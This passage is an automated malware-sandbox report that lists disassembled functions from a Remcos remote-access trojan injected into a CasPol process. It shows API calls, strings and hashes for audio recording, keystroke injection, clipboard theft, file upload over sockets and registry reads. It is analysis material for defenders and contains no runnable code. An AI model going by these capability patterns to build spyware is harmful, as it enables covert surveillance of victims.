Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54

waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2

Strings

`=G, xrefs: 00401B04
x=G, xrefs: 00401B8B
%Y-%m-%d %H.%M, xrefs: 00401AC4
.wav, xrefs: 00401AEC

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
API String ID: 3809562944-3643129801
Opcode ID: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
Opcode Fuzzy Hash: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A

Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
waveInStart.WINMM ref: 00401A81

Strings

XCG, xrefs: 004019A9
x=G, xrefs: 00401A1E
`=G, xrefs: 0040196F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: XCG$`=G$x=G
API String ID: 1356121797-903574159
Opcode ID: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
Opcode Fuzzy Hash: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C

Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998

Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
TranslateMessage.USER32(?), ref: 0041CA0B
DispatchMessageA.USER32(?), ref: 0041CA15
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22

Strings

Remcos, xrefs: 0041C9DA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D

Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
Opcode Fuzzy Hash: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9

Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
__alloca_probe_16.LIBCMT ref: 00452CA1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
__alloca_probe_16.LIBCMT ref: 00452D4B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
__freea.LIBCMT ref: 00452DBA
__freea.LIBCMT ref: 00452DC6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8

Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

_memcmp.LIBVCRUNTIME ref: 004446B3
_free.LIBCMT ref: 00444724
_free.LIBCMT ref: 0044473D
_free.LIBCMT ref: 0044476F
_free.LIBCMT ref: 00444778
_free.LIBCMT ref: 00444784

Strings

C, xrefs: 00444571

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44

Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

udp, xrefs: 00413B01
tcp, xrefs: 00413B2B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A

Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18

Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588

Strings

.part, xrefs: 00406C0F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A

Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE

Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C

_wcslen.LIBCMT ref: 0041A906

Strings

http\shell\open\command, xrefs: 0041A83D
program files (x86)\, xrefs: 0041A900
.exe, xrefs: 0041A858
program files\, xrefs: 0041A8EC, 0041A8F3, 0041A905
XCG, xrefs: 0041A8AC, 0041A8B1
:@, xrefs: 0041A8D3

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-703403762
Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9

Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
__alloca_probe_16.LIBCMT ref: 004499F2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
__alloca_probe_16.LIBCMT ref: 00449AD7
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
__freea.LIBCMT ref: 00449B47

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

__freea.LIBCMT ref: 00449B50
__freea.LIBCMT ref: 00449B75

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668

Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32 ref: 00418B18
SendInput.USER32(00000001,?,0000001C), ref: 00418B40
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
SendInput.USER32(00000001,?,0000001C), ref: 00418C0F

Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InputSend$Virtual
String ID:
API String ID: 1167301434-0
Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B

Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00415A46
EmptyClipboard.USER32 ref: 00415A54
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A

Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00446271
__freea.LIBCMT ref: 0044631B
__freea.LIBCMT ref: 00446339

Strings

am/pm, xrefs: 0044639C
fD, xrefs: 004465A3
a/p, xrefs: 00446400

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm$fD
API String ID: 3509577899-1143445303
Opcode ID: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
Opcode Fuzzy Hash: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B

Function 00447E4A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00447ECC
_free.LIBCMT ref: 00447EF0
_free.LIBCMT ref: 00448077
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
_free.LIBCMT ref: 00448243

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758

Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F885
_free.LIBCMT ref: 0044F893
_free.LIBCMT ref: 0044F9C1
_free.LIBCMT ref: 0044F9CC

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59

Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

_free.LIBCMT ref: 00444096
_free.LIBCMT ref: 004440AD
_free.LIBCMT ref: 004440CC
_free.LIBCMT ref: 004440E7
_free.LIBCMT ref: 004440FE

Strings

Z7D, xrefs: 00443FBB, 0044413D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: Z7D
API String ID: 3033488037-2145146825
Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88

Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
__fassign.LIBCMT ref: 0044A190
__fassign.LIBCMT ref: 0044A1AB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A

Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 004017F4

Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571

waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902

Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB

__Init_thread_footer.LIBCMT ref: 004017BC

Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C

Strings

T=G, xrefs: 00401800
>G, xrefs: 0040180B
>G, xrefs: 0040188E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: T=G$>G$>G
API String ID: 1596592924-1617985637
Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E

Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1

Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31

Strings

>G, xrefs: 00412CF0
TUFTUF, xrefs: 00412E2D
DG, xrefs: 00412CF8
DG, xrefs: 00412DFF

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: TUFTUF$>G$DG$DG
API String ID: 3114080316-344394840
Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE

Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00437ABB
___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
_ValidateLocalCookies.LIBCMT ref: 00437B51
__IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
_ValidateLocalCookies.LIBCMT ref: 00437BD1

Strings

csm, xrefs: 00437B66

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95

Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F

